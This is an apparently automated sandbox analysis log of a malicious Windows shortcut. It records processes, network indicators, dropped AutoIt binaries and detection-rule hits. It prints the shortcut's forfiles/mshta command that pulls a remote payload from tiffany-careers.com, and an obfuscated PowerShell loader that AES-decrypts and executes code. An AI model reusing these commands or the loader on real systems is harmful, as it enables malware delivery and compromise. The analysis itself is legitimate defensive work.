Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif, Code function: 27_2_00F7C2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,27_2_00F7C2FF
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif, Code function: 27_2_00F7CD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,27_2_00F7CD9F
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif, Code function: 27_2_00F7CD14 FindFirstFileW,FindClose,27_2_00F7CD14
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif, Code function: 27_2_00F7F5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,27_2_00F7F5D8
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 27_2_00F7F735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,27_2_00F7F735
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 27_2_00F7FA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,27_2_00F7FA36
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 27_2_00F73CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,27_2_00F73CE2
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OK Date: Wed, 18 Dec 2024 19:55:42 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30 Last-Modified: Sat, 14 Dec 2024 20:29:43 GMT ETag: "da2a8-62940cebb8084" Accept-Ranges: bytes Content-Length: 893608 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /test.pdf HTTP/1.1 Host: tiffany-careers.com Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /BFmcYQ.exe HTTP/1.1 Host: tiffany-careers.com
Source: global traffic HTTP traffic detected: GET /EsgMle.txt HTTP/1.1 Host: 139.99.188.124 Connection: Keep-Alive
Source: Joe Sandbox ViewIP Address: 139.99.188.124 139.99.188.124
Source: Joe Sandbox ViewASN Name: OVHFR OVHFR
Source: Joe Sandbox ViewASN Name: FREE-NET-ASFREEnetEU FREE-NET-ASFREEnetEU
Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49742 -> 147.45.49.155:80
Source: Network traffic Suricata IDS: 2833022 - Severity 1 - ETPRO MALWARE Possible Malicious Second Stage Download with Terse Headers : 147.45.49.155:80 -> 192.168.2.7:49742
Source: global traffic HTTP traffic detected: GET /duydemo HTTP/1.1 Accept: */* Accept-Language: en-CH UA-CPU: AMD64 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: tiffany-careers.com Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /hvshp HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 Host: 139.99.188.124 Connection: Keep-Alive
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: C:\Users\user\AppData\Roaming\BFmcYQ.exeCode function: 14_2_00007FF74D0BE968 InternetQueryDataAvailable,InternetReadFile,14_2_00007FF74D0BE968
Source: global traffic DNS traffic detected: DNS query: tiffany-careers.com
Source: global traffic DNS traffic detected: DNS query: x1.i.lencr.org
Source: global traffic DNS traffic detected: DNS query: nbhkmKSQnaDrIkubbvvLMhHdgigs.nbhkmKSQnaDrIkubbvvLMhHdgigs
Source: powershell.exe, 00000013.00000002.1778186746.0000026D1E158000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1778186746.0000026D1F076000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://139.99.188.124
Source: powershell.exe, 00000013.00000002.1778186746.0000026D1E158000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://139.99.188.124/EsgMle.txt
Source: BFmcYQ.exe, 0000000E.00000002.1668946917.0000019AF6E48000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://139.99.188.124/hvshp
Source: powershell.exe, 00000013.00000002.1778186746.0000026D1F076000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://139.99.H
Source: Guard.exe, 00000015.00000003.1752320141.00000000046B6000.00000004.00000020.00020000.00000000.sdmp, Guard.exe, 00000015.00000002.2651128046.00000000038D2000.00000004.00000020.00020000.00000000.sdmp, SwiftWrite.pif.21.drString found in binary or memory: http://crl.globalsign.com/gs/gstimestampingsha2g2.crl0
Source: Guard.exe, 00000015.00000003.1752320141.00000000046B6000.00000004.00000020.00020000.00000000.sdmp, Guard.exe, 00000015.00000002.2651128046.00000000038D2000.00000004.00000020.00020000.00000000.sdmp, SwiftWrite.pif.21.drString found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
Source: Guard.exe, 00000015.00000003.1752320141.00000000046B6000.00000004.00000020.00020000.00000000.sdmp, Guard.exe, 00000015.00000002.2651128046.00000000038D2000.00000004.00000020.00020000.00000000.sdmp, SwiftWrite.pif.21.drString found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
Source: Guard.exe, 00000015.00000003.1752320141.00000000046B6000.00000004.00000020.00020000.00000000.sdmp, Guard.exe, 00000015.00000002.2651128046.00000000038D2000.00000004.00000020.00020000.00000000.sdmp, SwiftWrite.pif.21.drString found in binary or memory: http://crl.globalsign.net/root-r3.crl0
Source: powershell.exe, 00000007.00000002.1579505691.000001EE08EC4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoftSb
Source: svchost.exe, 00000006.00000002.2648871899.000001F09D000000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
Source: svchost.exe, 00000006.00000003.1459048299.000001F09CE20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
Source: powershell.exe, 00000007.00000002.1656137707.000001EE1AD23000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1958024170.0000026D2DFA8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1778186746.0000026D1F841000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
Source: Guard.exe, 00000015.00000003.1752320141.00000000046B6000.00000004.00000020.00020000.00000000.sdmp, Guard.exe, 00000015.00000002.2651128046.00000000038D2000.00000004.00000020.00020000.00000000.sdmp, SwiftWrite.pif.21.drString found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
Source: Guard.exe, 00000015.00000003.1752320141.00000000046B6000.00000004.00000020.00020000.00000000.sdmp, Guard.exe, 00000015.00000002.2651128046.00000000038D2000.00000004.00000020.00020000.00000000.sdmp, SwiftWrite.pif.21.drString found in binary or memory: http://ocsp2.globalsign.com/gstimestampingsha2g20
Source: Guard.exe, 00000015.00000003.1752320141.00000000046B6000.00000004.00000020.00020000.00000000.sdmp, Guard.exe, 00000015.00000002.2651128046.00000000038D2000.00000004.00000020.00020000.00000000.sdmp, SwiftWrite.pif.21.drString found in binary or memory: http://ocsp2.globalsign.com/rootr306
Source: powershell.exe, 00000013.00000002.1778186746.0000026D1F7BB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000007.00000002.1580236263.000001EE0ACB1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1778186746.0000026D1DF31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Guard.exe, 00000015.00000003.1752320141.00000000046B6000.00000004.00000020.00020000.00000000.sdmp, Guard.exe, 00000015.00000002.2651128046.00000000038D2000.00000004.00000020.00020000.00000000.sdmp, SwiftWrite.pif.21.drString found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
Source: Guard.exe, 00000015.00000003.1752320141.00000000046B6000.00000004.00000020.00020000.00000000.sdmp, Guard.exe, 00000015.00000002.2651128046.00000000038D2000.00000004.00000020.00020000.00000000.sdmp, SwiftWrite.pif.21.drString found in binary or memory: http://secure.globalsign.com/cacert/gstimestampingsha2g2.crt0
Source: powershell.exe, 00000007.00000002.1580236263.000001EE0AEDA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tiffany-careers.com
Source: powershell.exe, 00000007.00000002.1580236263.000001EE0B14C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tiffany-careers.com/BFmcYQ.exep
Source: powershell.exe, 00000007.00000002.1580236263.000001EE0AEDA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tiffany-careers.com/test.pdf
Source: powershell.exe, 00000013.00000002.1778186746.0000026D1F593000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: powershell.exe, 00000013.00000002.1778186746.0000026D1F7BB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: Guard.exe, 00000015.00000002.2643185965.0000000000AE9000.00000002.00000001.01000000.0000000F.sdmp, Guard.exe, 00000015.00000003.1752320141.00000000046B6000.00000004.00000020.00020000.00000000.sdmp, SwiftWrite.pif, 0000001B.00000000.1906525938.0000000000FD9000.00000002.00000001.01000000.00000011.sdmp, SwiftWrite.pif.21.drString found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: powershell.exe, 00000007.00000002.1580236263.000001EE0ACB1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1778186746.0000026D1DF31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000013.00000002.1778186746.0000026D1F841000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000013.00000002.1778186746.0000026D1F841000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000013.00000002.1778186746.0000026D1F841000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
Source: svchost.exe, 00000006.00000003.1459048299.000001F09CE79000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/Prod1C:
Source: svchost.exe, 00000006.00000003.1459048299.000001F09CE20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/ProdV21C:
Source: powershell.exe, 00000013.00000002.1778186746.0000026D1F7BB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000013.00000002.1778186746.0000026D1F076000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
Source: mshta.exe, 00000004.00000003.1707086050.000002C2C9724000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.1720378439.000002C2C9727000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com
Source: powershell.exe, 00000007.00000002.1656137707.000001EE1AD23000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1958024170.0000026D2DFA8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1778186746.0000026D1F841000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000013.00000002.1778186746.0000026D1F593000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.org
Source: powershell.exe, 00000013.00000002.1778186746.0000026D1F593000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.orgX
Source: mshta.exe, 00000004.00000002.1720378439.000002C2C9727000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tiffany-careers.com/
Source: mshta.exe, 00000004.00000002.1722599843.000002CAD1440000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.1720205702.000002C2C96B6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.1719416835.000002C2C96B6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.1714521207.000002CACB972000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.1720006678.000002C2C9680000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.1707699079.000002CAD110C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tiffany-careers.com/duydemo
Source: powershell.exeString found in binary or memory: https://tiffany-careers.com/duydemo$global:?
Source: mshta.exe, 00000004.00000002.1720205702.000002C2C96B6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.1719416835.000002C2C96B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tiffany-careers.com/duydemo(
Source: mshta.exe, 00000004.00000002.1720950548.000002CACB946000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tiffany-careers.com/duydemo...
Source: mshta.exe, 00000004.00000002.1720950548.000002CACB930000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tiffany-careers.com/duydemo...6f-
Source: mshta.exe, 00000004.00000003.1712666267.000002C2C9706000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.1714778759.000002C2C9706000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.1720281906.000002C2C9706000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.1719158237.000002C2C9706000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tiffany-careers.com/duydemo6
Source: forfiles.exe, 00000001.00000002.1425154635.000002138F260000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tiffany-careers.com/duydemo=C:
Source: forfiles.exe, 00000001.00000002.1425075310.000002138F050000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.1707086050.000002C2C9760000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.1720495666.000002C2C9760000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.1715474320.000002C2C9760000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.1719251921.000002C2C9760000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.1720148189.000002C2C9690000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tiffany-careers.com/duydemoC:
Source: mshta.exe, 00000004.00000002.1720650071.000002C2CAF70000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://tiffany-careers.com/duydemoH
Source: mshta.exe, 00000004.00000002.1722445350.000002CAD110C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.1713934465.000002CAD110C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.1718694707.000002CAD110C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.1707699079.000002CAD110C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tiffany-careers.com/duydemoLMEMH
Source: s4PymYGgSh.lnkString found in binary or memory: https://tiffany-careers.com/duydemoOC:
Source: mshta.exe, 00000004.00000002.1720205702.000002C2C96B6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.1719416835.000002C2C96B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tiffany-careers.com/duydemoT
Source: mshta.exe, 00000004.00000003.1712666267.000002C2C96CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tiffany-careers.com/duydemoTTC:
Source: mshta.exe, 00000004.00000003.1716370101.000002CACF945000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://tiffany-careers.com/duydemohttps://tiffany-careers.com/duydemoP&
Source: mshta.exe, 00000004.00000002.1720006678.000002C2C9680000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tiffany-careers.com/duydemorDataFPS_BROW
Source: forfiles.exe, 00000001.00000002.1425075310.000002138F050000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tiffany-careers.com/duydemos
Source: mshta.exe, 00000004.00000003.1712666267.000002C2C9706000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.1714778759.000002C2C9706000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.1720281906.000002C2C9706000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.1719158237.000002C2C9706000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tiffany-careers.com/duydemoy.
Source: Guard.exe, 00000015.00000003.1752320141.00000000046B6000.00000004.00000020.00020000.00000000.sdmp, Guard.exe, 00000015.00000002.2651128046.00000000038D2000.00000004.00000020.00020000.00000000.sdmp, SwiftWrite.pif.21.drString found in binary or memory: https://www.autoitscript.com/autoit3/
Source: SwiftWrite.pif.21.drString found in binary or memory: https://www.globalsign.com/repository/0
Source: Guard.exe, 00000015.00000003.1752320141.00000000046B6000.00000004.00000020.00020000.00000000.sdmp, Guard.exe, 00000015.00000002.2651128046.00000000038D2000.00000004.00000020.00020000.00000000.sdmp, SwiftWrite.pif.21.drString found in binary or memory: https://www.globalsign.com/repository/06
Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
Source: unknownHTTPS traffic detected: 147.45.49.155:443 -> 192.168.2.7:49716 version: TLS 1.2
Source: C:\Users\user\AppData\Roaming\BFmcYQ.exeCode function: 14_2_00007FF74D0C0D24 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,14_2_00007FF74D0C0D24
Source: C:\Users\Public\Guard.exeCode function: 21_2_00A94830 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,21_2_00A94830
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 27_2_00F84830 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,27_2_00F84830
Source: C:\Users\user\AppData\Roaming\BFmcYQ.exeCode function: 14_2_00007FF74D0C0A6C OpenClipboard,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,14_2_00007FF74D0C0A6C
Source: C:\Users\user\AppData\Roaming\BFmcYQ.exeCode function: 14_2_00007FF74D0A8E18 GetParent,GetKeyboardState,SetKeyboardState,PostMessageW,PostMessageW,PostMessageW,PostMessageW,14_2_00007FF74D0A8E18
Source: C:\Users\Public\Guard.exeCode function: 21_2_00AAD164 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,21_2_00AAD164
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 27_2_00F9D164 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,27_2_00F9D164

System Summary

Source: Process Memory Space: powershell.exe PID: 8128, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: powershell.exe, 00000007.00000002.1656137707.000001EE1AF23000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_10ad10bb-4
Source: C:\Users\user\AppData\Roaming\BFmcYQ.exe Code function: This is a third-party compiled AutoIt script. 14_2_00007FF74D0337B0
Source: BFmcYQ.exe String found in binary or memory: This is a third-party compiled AutoIt script.
Source: BFmcYQ.exe, 0000000E.00000000.1574664212.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmp String found in binary or memory: This is a third-party compiled AutoIt script. memstr_bb14724d-a
Source: BFmcYQ.exe.7.dr String found in binary or memory: This is a third-party compiled AutoIt script. memstr_e169e38a-b
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\Public\Guard.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\BFmcYQ.exe
Source: C:\Windows\System32\wscript.exe COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
Source: s4PymYGgSh.lnk LNK file: /p C:\Windows\System32 /m cmmon32.exe /c "powershell . \*i*\*2\msh*e https://tiffany-careers.com/duydemo
Source: C:\Users\user\AppData\Roaming\BFmcYQ.exe Code function: 14_2_00007FF74D0B3E20: GetFullPathNameW,CreateDirectoryW,CreateFileW,RemoveDirectoryW,DeviceIoControl,CloseHandle,CloseHandle
Source: C:\Users\user\AppData\Roaming\BFmcYQ.exe Code function: 14_2_00007FF74D09CE68 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock
Source: C:\Users\user\AppData\Roaming\BFmcYQ.exe Code function: 14_2_00007FF74D0AD750 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState
Source: C:\Users\Public\Guard.exe Code function: 21_2_00A85778 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Code function: 27_2_00F75778 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState
Source: C:\Windows\System32\svchost.exe File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
Source: Joe Sandbox View Dropped File: C:\Users\Public\Guard.exe D8B7C7178FBADBF169294E4F29DCE582F89A5CF372E9DA9215AA082330DC12FD
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif D8B7C7178FBADBF169294E4F29DCE582F89A5CF372E9DA9215AA082330DC12FD
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Source: C:\Windows\System32\mshta.exe Process created: Commandline size = 2896
Source: Process Memory Space: powershell.exe PID: 8128, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: classification engine Classification label: mal100.expl.evad.winLNK@41/73@8/3
Source: C:\Users\user\AppData\Roaming\BFmcYQ.exe Code function: 14_2_00007FF74D0B3778 GetLastError,FormatMessageW
Source: C:\Users\user\AppData\Roaming\BFmcYQ.exe Code function: 14_2_00007FF74D09CCE0 AdjustTokenPrivileges,CloseHandle
Source: C:\Users\user\AppData\Roaming\BFmcYQ.exe Code function: 14_2_00007FF74D09D5CC LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError
Source: C:\Users\Public\Guard.exe Code function: 21_2_00A78DE9 AdjustTokenPrivileges,CloseHandle
Source: C:\Users\Public\Guard.exe Code function: 21_2_00A79399 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Code function: 27_2_00F68DE9 AdjustTokenPrivileges,CloseHandle
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Code function: 27_2_00F69399 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError
Source: C:\Users\user\AppData\Roaming\BFmcYQ.exe Code function: 14_2_00007FF74D0B59D8 SetErrorMode,GetDiskFreeSpaceW,GetLastError,SetErrorMode
Source: C:\Users\user\AppData\Roaming\BFmcYQ.exe Code function: 14_2_00007FF74D0CEB34 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle
Source: C:\Users\user\AppData\Roaming\BFmcYQ.exe Code function: 14_2_00007FF74D0B6D04 CoInitialize,CoCreateInstance,CoUninitialize
Source: C:\Users\user\AppData\Roaming\BFmcYQ.exe Code function: 14_2_00007FF74D036580 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource
Source: C:\Windows\System32\mshta.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\duydemo[1]
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7992:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6444:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:508:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8136:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kvqxrath.hyb.ps1
Source: C:\Windows\System32\conhost.exe File read: C:\Users\desktop.ini
Source: C:\Windows\System32\forfiles.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown Process created: C:\Windows\System32\forfiles.exe "C:\Windows\System32\forfiles.exe" /p C:\Windows\System32 /m cmmon32.exe /c "powershell . \*i*\*2\msh*e https://tiffany-careers.com/duydemo
Source: C:\Windows\System32\forfiles.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\forfiles.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe . \*i*\*2\msh*e https://tiffany-careers.com/duydemo
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\mshta.exe "C:\Windows\System32\mshta.exe" https://tiffany-careers.com/duydemo
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function clean ($VGARXd){return -split ($VGARXd -replace '..', '0x$& ')};$DLBqcOk = clean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fgNcqNX = [System.Security.Cryptography.Aes]::Create();$fgNcqNX.Key = clean('764F4D5163617754716D4B6C6E447878');$fgNcqNX.IV = New-Object byte[] 16;$ckcAaXbLZ = $fgNcqNX.CreateDecryptor();$lGOPfxpiP = [Text.Encoding]::UTF8.GetString($ckcAaXbLZ.TransformFinalBlock($DLBqcOk, 0,$DLBqcOk.Length)); & $lGOPfxpiP.Substring(0,3) $lGOPfxpiP.Substring(3)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
